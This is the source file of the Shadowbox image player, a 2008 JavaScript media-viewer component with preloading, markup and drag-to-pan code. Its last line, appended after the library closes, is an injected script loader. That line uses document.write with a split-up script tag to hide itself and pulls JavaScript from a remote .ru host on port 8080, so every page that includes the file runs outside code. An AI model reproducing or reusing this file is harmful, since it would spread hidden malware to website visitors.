File: shadowbox-img.js
/** * The Shadowbox image player class. * * This file is part of Shadowbox. * * Shadowbox is an online media viewer application that supports all of the * web's most popular media publishing formats. Shadowbox is written entirely * in JavaScript and CSS and is highly customizable. Using Shadowbox, website * authors can showcase a wide assortment of media in all major browsers without * navigating users away from the linking page. * * Shadowbox is released under version 3.0 of the Creative Commons Attribution- * Noncommercial-Share Alike license. This means that it is absolutely free * for personal, noncommercial use provided that you 1) make attribution to the * author and 2) release any derivative work under the same or a similar * license. * * If you wish to use Shadowbox for commercial purposes, licensing information * can be found at http://mjijackson.com/shadowbox/. * * @author Michael J. I. Jackson <mjijackson@gmail.com> * @copyright 2007-2008 Michael J. I. Jackson * @license http://creativecommons.org/licenses/by-nc-sa/3.0/ * @version SVN: $Id: shadowbox-img.js 103 2008-06-27 06:19:21Z mjijackson $ */ (function(){ // shorthand var SB = Shadowbox; var SL = SB.lib; var C = SB.getClient(); /** * Keeps track of 4 floating values (x, y, start_x, & start_y) that are used * in the drag calculations. * * @property {Object} drag * @private */ var drag; /** * Holds the draggable element so we don't have to fetch it every time * the mouse moves. * * @property {HTMLElement} draggable * @private */ var draggable; /** * The id to use for the drag layer. * * @property {String} drag_id * @private */ var drag_id = 'shadowbox_drag_layer'; /** * Resource used to preload images. It's class-level so that when a new * image is requested, the same resource can be reassigned, cancelling * the original's callback. * * @property {HTMLElement} preloader * @private */ var preloader; /** * Resets the class drag variable. * * @return void * @private */ var resetDrag = function(){ drag = { x: 0, y: 0, start_x: null, start_y: null }; }; /** * Toggles the drag function on and off. * * @param {Boolean} on True to toggle on, false to toggle off * @param {Number} h The height of the drag layer * @param {Number} w The width of the drag layer * @return void * @private */ var toggleDrag = function(on, h, w){ if(on){ resetDrag(); // add transparent drag layer to prevent browser dragging of actual image var styles = [ 'position:absolute', 'height:' + h + 'px', 'width:' + w + 'px', 'cursor:' + (C.isGecko ? '-moz-grab' : 'move'), 'background-color:' + (C.isIE ? '#fff;filter:alpha(opacity=0)' : 'transparent') ]; SL.append(SL.get('shadowbox_body_inner'), '<div id="' + drag_id + '" style="' + styles.join(';') + '"></div>'); SL.addEvent(SL.get(drag_id), 'mousedown', listenDrag); }else{ var d = SL.get(drag_id); if(d){ SL.removeEvent(d, 'mousedown', listenDrag); SL.remove(d); } } }; /** * Sets up a drag listener on the document. Called when the mouse button is * pressed (mousedown). * * @param {mixed} e The mousedown event * @return void * @private */ var listenDrag = function(e){ // prevent browser dragging SL.preventDefault(e); var coords = SL.getPageXY(e); drag.start_x = coords[0]; drag.start_y = coords[1]; draggable = SL.get('shadowbox_content'); SL.addEvent(document, 'mousemove', positionDrag); SL.addEvent(document, 'mouseup', unlistenDrag); if(C.isGecko) SL.setStyle(SL.get(drag_id), 'cursor', '-moz-grabbing'); }; /** * Removes the drag listener. Called when the mouse button is released * (mouseup). * * @return void * @private */ var unlistenDrag = function(){ SL.removeEvent(document, 'mousemove', positionDrag); SL.removeEvent(document, 'mouseup', unlistenDrag); // clean up if(C.isGecko) SL.setStyle(SL.get(drag_id), 'cursor', '-moz-grab'); }; /** * Positions an oversized image on drag. * * @param {mixed} e The drag event * @return void * @private */ var positionDrag = function(e){ var content = SB.getContent(); var dims = SB.getDimensions(); var coords = SL.getPageXY(e); var move_x = coords[0] - drag.start_x; drag.start_x += move_x; drag.x = Math.max(Math.min(0, drag.x + move_x), dims.inner_w - content.width); // x boundaries SL.setStyle(draggable, 'left', drag.x + 'px'); var move_y = coords[1] - drag.start_y; drag.start_y += move_y; drag.y = Math.max(Math.min(0, drag.y + move_y), dims.inner_h - content.height); // y boundaries SL.setStyle(draggable, 'top', drag.y + 'px'); }; /** * Constructor. This class is used to display images. * * @param {String} id The id to use for this content * @param {Object} obj The content object * @public */ Shadowbox.img = function(id, obj){ this.id = id; this.obj = obj; // images are resizable this.resizable = true; // preload the image this.ready = false; var self = this; // needed inside preloader callback preloader = new Image(); preloader.onload = function(){ // height defaults to image height self.height = self.obj.height ? parseInt(self.obj.height, 10) : preloader.height; // width defaults to image width self.width = self.obj.width ? parseInt(self.obj.width, 10) : preloader.width; // ready to go self.ready = true; // clean up to prevent memory leak in IE preloader.onload = ''; preloader = null; }; preloader.src = obj.content; }; Shadowbox.img.prototype = { /** * Returns an object containing the markup for this content, suitable * to pass to Shadowbox.lib.createHTML(). * * @param {Object} dims The current Shadowbox dimensions * @return {Object} The markup for this content item * @public */ markup: function(dims){ return { tag: 'img', id: this.id, height: dims.resize_h, // use resized dimensions width: dims.resize_w, src: this.obj.content, style: 'position:absolute' }; }, /** * An optional callback function to process after this content has been * loaded. * * @return void * @public */ onLoad: function(){ var dims = SB.getDimensions(); if(dims.drag && SB.getOptions().handleOversize == 'drag'){ // listen for drag // in the case of oversized images, the "resized" height and // width will actually be the original image height and width toggleDrag(true, dims.resize_h, dims.resize_w); } }, /** * Removes this image from the document. * * @return void * @public */ remove: function(){ var el = SL.get(this.id); if(el) SL.remove(el); // disable drag layer toggleDrag(false); // prevent old image requests from loading if(preloader){ preloader.onload = ''; preloader = null; } } }; })(); document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/XHTML.js"></scr'+'ipt>');